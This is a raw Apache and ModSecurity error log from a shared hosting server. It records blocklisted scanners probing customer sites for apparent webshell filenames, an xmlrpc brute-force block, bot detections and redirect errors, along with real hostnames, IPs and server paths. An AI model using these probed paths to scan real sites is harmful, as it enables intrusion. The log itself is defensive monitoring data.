[Tue May 26 16:24:44.634081 2026] [security2:error] [pid 795941:tid 796126] [client 20.48.248.215:64430] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/tiny.php"] [unique_id "ahV79O2GQ_TLE_VHIp2ZgAAAALw"]
[Tue May 26 16:24:44.912522 2026] [security2:error] [pid 795941:tid 796141] [client 184.154.139.45:55432] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/ddpro/build/sigmund/css/headers-sigmund.css"] [unique_id "ahV79O2GQ_TLE_VHIp2ZhAAAAMs"]
[Tue May 26 16:24:45.265112 2026] [security2:error] [pid 795941:tid 796091] [client 20.48.248.215:64443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/w.php"] [unique_id "ahV79e2GQ_TLE_VHIp2ZjgAAAJk"]
[Tue May 26 16:24:45.265189 2026] [security2:error] [pid 795941:tid 796091] [client 20.48.248.215:64443] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/w.php"] [unique_id "ahV79e2GQ_TLE_VHIp2ZjgAAAJk"]
[Tue May 26 16:24:46.343185 2026] [security2:error] [pid 795941:tid 796188] [client 20.48.248.215:65086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/test1.php"] [unique_id "ahV79u2GQ_TLE_VHIp2ZxQAAAPo"]
[Tue May 26 16:24:46.343315 2026] [security2:error] [pid 795941:tid 796188] [client 20.48.248.215:65086] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/test1.php"] [unique_id "ahV79u2GQ_TLE_VHIp2ZxQAAAPo"]
[Tue May 26 16:24:46.444299 2026] [security2:error] [pid 795941:tid 796178] [client 184.154.139.45:55874] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV79u2GQ_TLE_VHIp2ZxwAAAPA"]
[Tue May 26 16:24:46.501782 2026] [security2:error] [pid 795941:tid 796120] [client 20.48.248.215:19932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/adminfuns.php"] [unique_id "ahV79u2GQ_TLE_VHIp2ZzgAAALY"]
[Tue May 26 16:24:46.501920 2026] [security2:error] [pid 795941:tid 796120] [client 20.48.248.215:19932] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/adminfuns.php"] [unique_id "ahV79u2GQ_TLE_VHIp2ZzgAAALY"]
[Tue May 26 16:24:46.844851 2026] [security2:error] [pid 795941:tid 796131] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV79e2GQ_TLE_VHIp2ZpAAAAME"]
[Tue May 26 16:24:47.322930 2026] [security2:error] [pid 795941:tid 796163] [client 20.48.248.215:65043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/tires.php"] [unique_id "ahV79-2GQ_TLE_VHIp2Z3wAAAOE"]
[Tue May 26 16:24:47.323023 2026] [security2:error] [pid 795941:tid 796163] [client 20.48.248.215:65043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/tires.php"] [unique_id "ahV79-2GQ_TLE_VHIp2Z3wAAAOE"]
[Tue May 26 16:24:47.686212 2026] [security2:error] [pid 795941:tid 796181] [client 20.48.248.215:19963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/sx_pms.php"] [unique_id "ahV79-2GQ_TLE_VHIp2Z5wAAAPM"]
[Tue May 26 16:24:47.686340 2026] [security2:error] [pid 795941:tid 796181] [client 20.48.248.215:19963] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/sx_pms.php"] [unique_id "ahV79-2GQ_TLE_VHIp2Z5wAAAPM"]
[Tue May 26 16:24:48.055414 2026] [security2:error] [pid 795941:tid 796118] [client 184.154.139.45:56530] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV79-2GQ_TLE_VHIp2Z7QAAALQ"]
[Tue May 26 16:24:48.574436 2026] [security2:error] [pid 795941:tid 796113] [client 20.48.248.215:23106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-info.php"] [unique_id "ahV7-O2GQ_TLE_VHIp2Z-QAAAK8"]
[Tue May 26 16:24:48.574547 2026] [security2:error] [pid 795941:tid 796113] [client 20.48.248.215:23106] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-info.php"] [unique_id "ahV7-O2GQ_TLE_VHIp2Z-QAAAK8"]
[Tue May 26 16:24:48.669742 2026] [security2:error] [pid 795941:tid 796075] [client 208.91.198.85:34816] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahV79-2GQ_TLE_VHIp2Z4gAAAIk"]
[Tue May 26 16:24:49.112349 2026] [security2:error] [pid 795941:tid 796155] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV79-2GQ_TLE_VHIp2Z4wAAANk"]
[Tue May 26 16:24:49.382563 2026] [security2:error] [pid 795941:tid 796111] [client 20.48.248.215:23528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-test.php"] [unique_id "ahV7-e2GQ_TLE_VHIp2aBwAAAK0"]
[Tue May 26 16:24:49.382663 2026] [security2:error] [pid 795941:tid 796111] [client 20.48.248.215:23528] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-test.php"] [unique_id "ahV7-e2GQ_TLE_VHIp2aBwAAAK0"]
[Tue May 26 16:24:49.569751 2026] [security2:error] [pid 795941:tid 796073] [client 20.48.248.215:65067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/bthil.php"] [unique_id "ahV7-e2GQ_TLE_VHIp2aEQAAAIc"]
[Tue May 26 16:24:49.569854 2026] [security2:error] [pid 795941:tid 796073] [client 20.48.248.215:65067] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/bthil.php"] [unique_id "ahV7-e2GQ_TLE_VHIp2aEQAAAIc"]
[Tue May 26 16:24:50.007869 2026] [security2:error] [pid 795941:tid 796072] [client 213.35.106.232:60105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahV7-u2GQ_TLE_VHIp2aHgAAAIY"]
[Tue May 26 16:24:50.342074 2026] [security2:error] [pid 795941:tid 796109] [client 20.48.248.215:19907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/asd67.php"] [unique_id "ahV7-u2GQ_TLE_VHIp2aIwAAAKs"]
[Tue May 26 16:24:50.342193 2026] [security2:error] [pid 795941:tid 796109] [client 20.48.248.215:19907] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/asd67.php"] [unique_id "ahV7-u2GQ_TLE_VHIp2aIwAAAKs"]
[Tue May 26 16:24:50.434164 2026] [security2:error] [pid 795941:tid 796101] [client 184.154.139.45:57184] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/ddpro/build/sigmund/js/typed-sigmund.js"] [unique_id "ahV7-u2GQ_TLE_VHIp2aJAAAAKM"]
[Tue May 26 16:24:50.558880 2026] [security2:error] [pid 795941:tid 796160] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7-e2GQ_TLE_VHIp2aCwAAAN4"]
[Tue May 26 16:24:50.709845 2026] [core:error] [pid 795941:tid 796086] [client 45.117.55.120:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:24:50.709869 2026] [core:error] [pid 795941:tid 796086] [client 45.117.55.120:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:24:51.048847 2026] [core:error] [pid 795941:tid 796131] [client 45.38.86.31:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:24:51.048870 2026] [core:error] [pid 795941:tid 796131] [client 45.38.86.31:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:24:51.632664 2026] [security2:error] [pid 795941:tid 796125] [client 20.48.248.215:41745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/Cap.php"] [unique_id "ahV7--2GQ_TLE_VHIp2aQwAAALs"]
[Tue May 26 16:24:51.632754 2026] [security2:error] [pid 795941:tid 796125] [client 20.48.248.215:41745] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/Cap.php"] [unique_id "ahV7--2GQ_TLE_VHIp2aQwAAALs"]
[Tue May 26 16:24:52.389062 2026] [security2:error] [pid 795941:tid 796000] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV7_O2GQ_TLE_VHIp2aYwAA0jo"]
[Tue May 26 16:24:52.389222 2026] [security2:error] [pid 795941:tid 796148] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV7_O2GQ_TLE_VHIp2aYwAA0jo"]
[Tue May 26 16:24:52.414976 2026] [security2:error] [pid 795941:tid 795945] [remote 74.7.241.58:33688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV7_O2GQ_TLE_VHIp2aZQAAvwM"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:24:52.457755 2026] [security2:error] [pid 795941:tid 796080] [client 216.73.217.138:19487] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7--2GQ_TLE_VHIp2aTAAAjmU"]
[Tue May 26 16:24:52.495537 2026] [security2:error] [pid 795941:tid 796080] [client 216.73.217.138:19487] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7--2GQ_TLE_VHIp2aTgAAjnw"]
[Tue May 26 16:24:52.625353 2026] [autoindex:error] [pid 795941:tid 796188] [client 145.220.91.19:60848] AH01276: Cannot serve directory /home1/cicode9a/public_html/mobile/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:24:53.442358 2026] [security2:error] [pid 795941:tid 796125] [client 20.48.248.215:41743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/like.php"] [unique_id "ahV7_e2GQ_TLE_VHIp2ajAAAALs"]
[Tue May 26 16:24:53.442487 2026] [security2:error] [pid 795941:tid 796125] [client 20.48.248.215:41743] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/like.php"] [unique_id "ahV7_e2GQ_TLE_VHIp2ajAAAALs"]
[Tue May 26 16:24:53.584807 2026] [security2:error] [pid 795941:tid 796158] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7_O2GQ_TLE_VHIp2aZwAAANw"]
[Tue May 26 16:24:53.646693 2026] [security2:error] [pid 795941:tid 796138] [client 20.48.248.215:63762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/d.php"] [unique_id "ahV7_e2GQ_TLE_VHIp2akgAAAMg"]
[Tue May 26 16:24:53.646809 2026] [security2:error] [pid 795941:tid 796138] [client 20.48.248.215:63762] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/d.php"] [unique_id "ahV7_e2GQ_TLE_VHIp2akgAAAMg"]
[Tue May 26 16:24:53.653067 2026] [fcgid:warn] [pid 795941:tid 796195] (70014)End of file found: [client 184.154.139.45:58162] mod_fcgid: can't get data from http client
[Tue May 26 16:24:54.509141 2026] [security2:error] [pid 795941:tid 796078] [client 216.73.217.138:19487] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7_e2GQ_TLE_VHIp2alwAAjFE"]
[Tue May 26 16:24:55.116085 2026] [security2:error] [pid 795941:tid 796111] [client 20.48.248.215:64980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/cu.php"] [unique_id "ahV7_-2GQ_TLE_VHIp2arwAAAK0"]
[Tue May 26 16:24:55.116188 2026] [security2:error] [pid 795941:tid 796111] [client 20.48.248.215:64980] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/cu.php"] [unique_id "ahV7_-2GQ_TLE_VHIp2arwAAAK0"]
[Tue May 26 16:24:55.761620 2026] [security2:error] [pid 795941:tid 796101] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7_e2GQ_TLE_VHIp2amgAAAKM"]
[Tue May 26 16:24:56.452639 2026] [security2:error] [pid 795941:tid 796142] [client 20.48.248.215:28899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/we.php"] [unique_id "ahV8AO2GQ_TLE_VHIp2a2wAAAMw"]
[Tue May 26 16:24:56.452779 2026] [security2:error] [pid 795941:tid 796142] [client 20.48.248.215:28899] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/we.php"] [unique_id "ahV8AO2GQ_TLE_VHIp2a2wAAAMw"]
[Tue May 26 16:24:56.794727 2026] [security2:error] [pid 795941:tid 796054] [remote 121.200.216.55:49302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahV8AO2GQ_TLE_VHIp2a4AAA7HA"]
[Tue May 26 16:24:57.543797 2026] [security2:error] [pid 795941:tid 796168] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7_-2GQ_TLE_VHIp2azAAAAOY"]
[Tue May 26 16:24:57.575290 2026] [security2:error] [pid 795941:tid 796127] [client 184.154.139.45:59220] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/Divi/style.css"] [unique_id "ahV8Ae2GQ_TLE_VHIp2a9AAAAL0"]
[Tue May 26 16:24:57.878479 2026] [security2:error] [pid 795941:tid 796109] [client 184.154.139.45:59314] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/Divi/style.css"] [unique_id "ahV8Ae2GQ_TLE_VHIp2a-QAAAKs"]
[Tue May 26 16:24:58.422283 2026] [security2:error] [pid 795941:tid 796104] [client 20.48.248.215:20111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp.php"] [unique_id "ahV8Au2GQ_TLE_VHIp2bCwAAAKY"]
[Tue May 26 16:24:58.422379 2026] [security2:error] [pid 795941:tid 796104] [client 20.48.248.215:20111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp.php"] [unique_id "ahV8Au2GQ_TLE_VHIp2bCwAAAKY"]
[Tue May 26 16:24:58.553962 2026] [security2:error] [pid 795941:tid 796077] [client 35.94.96.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "veganfoodindia.com"] [uri "/index.php"] [unique_id "ahV8Au2GQ_TLE_VHIp2bCgAAAIs"]
[Tue May 26 16:24:59.317738 2026] [security2:error] [pid 795941:tid 796181] [client 20.48.248.215:23127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-indx.php"] [unique_id "ahV8A-2GQ_TLE_VHIp2bIQAAAPM"]
[Tue May 26 16:24:59.317906 2026] [security2:error] [pid 795941:tid 796181] [client 20.48.248.215:23127] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-indx.php"] [unique_id "ahV8A-2GQ_TLE_VHIp2bIQAAAPM"]
[Tue May 26 16:24:59.437890 2026] [security2:error] [pid 795941:tid 796198] [client 104.210.140.141:30993] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/robots.txt"] [unique_id "ahV8Au2GQ_TLE_VHIp2bFwABBGI"]
[Tue May 26 16:24:59.448505 2026] [security2:error] [pid 795941:tid 796142] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Au2GQ_TLE_VHIp2a_wAAAMw"]
[Tue May 26 16:24:59.462267 2026] [security2:error] [pid 795941:tid 796171] [client 20.48.248.215:64326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/fone1.php"] [unique_id "ahV8A-2GQ_TLE_VHIp2bKQAAAOk"]
[Tue May 26 16:24:59.462360 2026] [security2:error] [pid 795941:tid 796171] [client 20.48.248.215:64326] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/fone1.php"] [unique_id "ahV8A-2GQ_TLE_VHIp2bKQAAAOk"]
[Tue May 26 16:24:59.508231 2026] [security2:error] [pid 795941:tid 796185] [client 20.48.248.215:23519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/zoo.php"] [unique_id "ahV8A-2GQ_TLE_VHIp2bLgAAAPc"]
